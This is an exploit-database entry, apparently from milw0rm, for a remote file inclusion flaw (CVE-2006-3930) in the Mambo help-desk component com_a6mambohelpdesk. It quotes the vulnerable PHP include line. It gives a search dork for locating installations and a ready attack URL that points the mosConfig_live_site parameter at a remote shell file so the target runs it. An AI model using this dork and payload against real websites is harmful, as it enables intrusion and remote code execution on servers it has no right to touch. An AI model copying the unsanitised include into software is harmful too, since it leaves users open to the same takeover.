EXPLOITS

Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion

Author: Dr.Jr7
type: webapps
platform: php
port: 
date_added: 2006-07-26  
date_updated: 2016-10-31  
verified: 1  
codes: OSVDB-27654;CVE-2006-3930  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2078.txt  

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb

# codes

<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>

# d0rkiz : allinurl:"com_a6mambohelpdesk"

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt


# by Dr.Jr7

# milw0rm.com [2006-07-27]